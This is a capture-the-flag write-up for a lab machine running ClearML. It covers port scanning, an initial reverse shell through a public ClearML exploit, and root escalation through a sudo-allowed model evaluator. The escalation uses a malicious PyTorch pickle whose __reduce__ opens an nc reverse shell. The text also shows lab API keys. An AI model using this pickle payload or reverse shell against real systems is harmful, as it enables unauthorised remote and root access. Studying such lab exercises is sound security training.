This is a Debian 11 machine dedicated to train and deploy ML and LLM models. It runs a vulnerable version of CleanML which can be exploited to get an initial user shell. Regarding escalation, we abuse the deserialization feature of the Python PyTorch machine learning library.
> nmap $target -p- --min-rate=5000 -Pn --open --reason
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-24 09:44 EDT
Nmap scan report for 10.10.11.19
Host is up, received user-set (0.038s latency).
Not shown: 63537 closed tcp ports (conn-refused), 1996 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
Nmap done: 1 IP address (1 host up) scanned in 13.38 seconds
Enumerate the open ports.
> nmap $target -p22,80 -sV -sC -Pn -vv -n
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-24 09:45 EDT
Nmap scan report for 10.10.11.19
Host is up, received user-set (0.24s latency).
Scanned at 2024-09-24 09:45:00 EDT for 8s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 3e21d5dc2e61eb8fa63b242ab71c05d3 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC0B2izYdzgANpvBJW4Ym5zGRggYqa8smNlnRrVK6IuBtHzdlKgcFf+Gw0kSgJEouRe8eyVV9iAyD9HXM2L0N/17+rIZkSmdZPQi8chG/PyZ+H1FqcFB2LyxrynHCBLPTWyuN/tXkaVoDH/aZd1gn9QrbUjSVo9mfEEnUduO5Abf1mnBnkt3gLfBWKq1P1uBRZoAR3EYDiYCHbuYz30rhWR8SgE7CaNlwwZxDxYzJGFsKpKbR+t7ScsviVnbfEwPDWZVEmVEd0XYp1wb5usqWz2k7AMuzDpCyI8klc84aWVqllmLml443PDMIh1Ud2vUnze3FfYcBOo7DiJg7JkEWpcLa6iTModTaeA1tLSUJi3OYJoglW0xbx71di3141pDyROjnIpk/K45zR6CbdRSSqImPPXyo3UrkwFTPrSQbSZfeKzAKVDZxrVKq+rYtd+DWESp4nUdat0TXCgefpSkGfdGLxPZzFg0cQ/IF1cIyfzo1gicwVcLm4iRD9umBFaM2E=
| 256 3911423f0c250008d72f1b51e0439d85 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFMB/Pupk38CIbFpK4/RYPqDnnx8F2SGfhzlD32riRsRQwdf19KpqW9Cfpp2xDYZDhA3OeLV36bV5cdnl07bSsw=
| 256 b06fa00a9edfb17a497886b23540ec95 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOjcxHOO/Vs6yPUw6ibE6gvOuakAnmR7gTk/yE2yJA/3
80/tcp open http syn-ack nginx 1.18.0
|_http-title: Did not follow redirect to http://app.blurry.htb/
|_http-server-header: nginx/1.18.0
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up) scanned in 8.62 seconds
Add to hosts file and enumerate the site with Firefox. A ClearML web site appears, according to the developers site, this is "a platform to build, train, and deploy your AI/ML and LLM models".
In CleanML, open one the project "Black Swan" and click on "New experiment". You are presented instructions to configure a local clearml client.
Follow the instructions, first install clearml client.
> pip install clearml
Then run the configuration script clearml-init and paste the API configuration.
> /home/kali/.local/bin/clearml-init
ClearML SDK setup process
Please create new clearml credentials through the settings page in your `clearml-server` web app (e.g. http://localhost:8080//settings/workspace-configuration)
Or create a free account at https://app.clear.ml/settings/workspace-configuration
In settings page, press "Create new credentials", then press "Copy to clipboard".
Paste copied configuration here:
api {
web_server: http://app.blurry.htb
api_server: http://api.blurry.htb
files_server: http://files.blurry.htb
credentials {
"access_key" = "HWX9ONLPLTODL5NZ2DEO"
"secret_key" = "FdPvJ2fwfRYcqXs4CmQPAddC7RSuFFajPTsd1E7BXUgIlLXDJg"
}
}
Detected credentials key="HWX9ONLPLTODL5NZ2DEO" secret="FdPv***"
ClearML Hosts configuration:
Web App: http://app.blurry.htb
API: http://api.blurry.htb
File Store: http://files.blurry.htb
Verifying credentials ...
Credentials verified!
New configuration stored in /home/kali/clearml.conf
ClearML setup completed successfully.
Now start a listener and run the exploit.py from the GitHub repository. Enter option 2 ("Run exploit"), then enter your IP and the listener port. Finally enter the project name, which is the one you used to create the experiment ("Black Swan" in this case).
Shortly after, a reverse shell for user jippity is received on port 1919.
To stabilize this shell we move to ~/.ssh folder and retrieve a private key, then use it to open an SSH session as user jippity
Which can be used to retrieve the user flag.
ROOT
Start from the jippity SSH session and take the opportunity to enumerate the user and the system.
User jippity may run the following sudo command on the host:
> sudo -l
Matching Defaults entries for jippity on blurry:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
(root) NOPASSWD: /usr/bin/evaluate_model /models/*.pth
Basically, the user is allowed to run /usr/bin/evaluate_model as root with the .pth files located in the /models directory. No password will be prompted.
Enumerate the script /usr/bin/evaluate_model
#!/bin/bash
# Evaluate a given model against our proprietary dataset.
# Security checks against model file included.
if [ "$#" -ne 1 ]; then
/usr/bin/echo "Usage: $0 <path_to_model.pth>"
exit 1
fi
MODEL_FILE="$1"
TEMP_DIR="/opt/temp"
PYTHON_SCRIPT="/models/evaluate_model.py"
/usr/bin/mkdir -p "$TEMP_DIR"
file_type=$(/usr/bin/file --brief "$MODEL_FILE")
# Extract based on file type
if [[ "$file_type" == *"POSIX tar archive"* ]]; then
# POSIX tar archive (older PyTorch format)
/usr/bin/tar -xf "$MODEL_FILE" -C "$TEMP_DIR"
elif [[ "$file_type" == *"Zip archive data"* ]]; then
# Zip archive (newer PyTorch format)
/usr/bin/unzip -q "$MODEL_FILE" -d "$TEMP_DIR"
else
/usr/bin/echo "[!] Unknown or unsupported file format for $MODEL_FILE"
exit 2
fi
/usr/bin/find "$TEMP_DIR" -type f \( -name "*.pkl" -o -name "pickle" \) -print0 | while IFS= read -r -d $'\0' extracted_pkl; do
fickling_output=$(/usr/local/bin/fickling -s --json-output /dev/fd/1 "$extracted_pkl")
if /usr/bin/echo "$fickling_output" | /usr/bin/jq -e 'select(.severity == "OVERTLY_MALICIOUS")' >/dev/null; then
/usr/bin/echo "[!] Model $MODEL_FILE contains OVERTLY_MALICIOUS components and will be deleted."
/bin/rm "$MODEL_FILE"
break
fi
done
/usr/bin/find "$TEMP_DIR" -type f -exec /bin/rm {} +
/bin/rm -rf "$TEMP_DIR"
if [ -f "$MODEL_FILE" ]; then
/usr/bin/echo "[+] Model $MODEL_FILE is considered safe. Processing..."
/usr/bin/python3 "$PYTHON_SCRIPT" "$MODEL_FILE"
fi
We see the script checks input file (which is called "model file"), extracts it and run binary /usr/local/bin/fickling on it. Other interesting things mentioned are a library called PyTorch and a Python script located /models/evaluate_model.py
Enumerate the Python script.
import torch
import torch.nn as nn
from torchvision import transforms
from torchvision.datasets import CIFAR10
from torch.utils.data import DataLoader, Subset
import numpy as np
import sys
class CustomCNN(nn.Module):
def __init__(self):
super(CustomCNN, self).__init__()
self.conv1 = nn.Conv2d(in_channels=3, out_channels=16, kernel_size=3, padding=1)
self.conv2 = nn.Conv2d(in_channels=16, out_channels=32, kernel_size=3, padding=1)
self.pool = nn.MaxPool2d(kernel_size=2, stride=2, padding=0)
self.fc1 = nn.Linear(in_features=32 * 8 * 8, out_features=128)
self.fc2 = nn.Linear(in_features=128, out_features=10)
self.relu = nn.ReLU()
def forward(self, x):
x = self.pool(self.relu(self.conv1(x)))
x = self.pool(self.relu(self.conv2(x)))
x = x.view(-1, 32 * 8 * 8)
x = self.relu(self.fc1(x))
x = self.fc2(x)
return x
def load_model(model_path):
model = CustomCNN()
state_dict = torch.load(model_path)
model.load_state_dict(state_dict)
model.eval()
return model
def prepare_dataloader(batch_size=32):
transform = transforms.Compose([
transforms.RandomHorizontalFlip(),
transforms.RandomCrop(32, padding=4),
transforms.ToTensor(),
transforms.Normalize(mean=[0.4914, 0.4822, 0.4465], std=[0.2023, 0.1994, 0.2010]),
])
dataset = CIFAR10(root='/root/datasets/', train=False, download=False, transform=transform)
subset = Subset(dataset, indices=np.random.choice(len(dataset), 64, replace=False))
dataloader = DataLoader(subset, batch_size=batch_size, shuffle=False)
return dataloader
def evaluate_model(model, dataloader):
correct = 0
total = 0
with torch.no_grad():
for images, labels in dataloader:
outputs = model(images)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
accuracy = 100 * correct / total
print(f'[+] Accuracy of the model on the test dataset: {accuracy:.2f}%')
def main(model_path):
model = load_model(model_path)
print("[+] Loaded Model.")
dataloader = prepare_dataloader()
print("[+] Dataloader ready. Evaluating model...")
evaluate_model(model, dataloader)
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: python script.py <path_to_model.pth>")
else:
model_path = sys.argv[1] # Path to the .pth file
main(model_path)
Here we see more references to a library called torch, and a call to the function torch.load(model_path), which is executed on the input file (the "model file").
Now it is time to make some research on the things we have discovered. Long story short:
PyTorch is an open-source machine learning library for Python based on the torch library. When needed, it stores serialized data as .pth files. It uses the functions torch.save() for serializing and torch.load() for deserializing (https://medium.com/@yulin_li/what-exactly-is-the-pth-file-9a487044a36b).
PyTorch functions rely on the Python pickle module, which is who actually implements the binaries for serializing and deserializing data (https://docs.python.org/3/library/pickle.html).
In summary, custom pickling and unpickling code can be used with a method called __reduce__. I took the script published in the mentioned site and, after some modifications and testing, I found a workable malicious script.
import torch
import os
import pickle
class Evilpickle:
def __reduce__(self):
return (os.system, ('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <your ip here> 1919 >/tmp/f',))
pickle_data = Evilpickle()
torch.save(pickle_data, '/models/exploit.pth')
The script was modified to add a call to torch.save() to serialize the data, and get rid of the pickle.dumps() function.
Save the script as ~/exploit.py and execute it to generate the serialized malicious model file exploit.pth
> python3 ~/exploit.py
Now we have a malicious serialized payload in /models/exploit.pth. Start a listener and run it with sudo
> sudo /usr/bin/evaluate_model /models/exploit.pth
[+] Model /models/exploit.pth is considered safe. Processing...
rm: cannot remove '/tmp/f': No such file or directory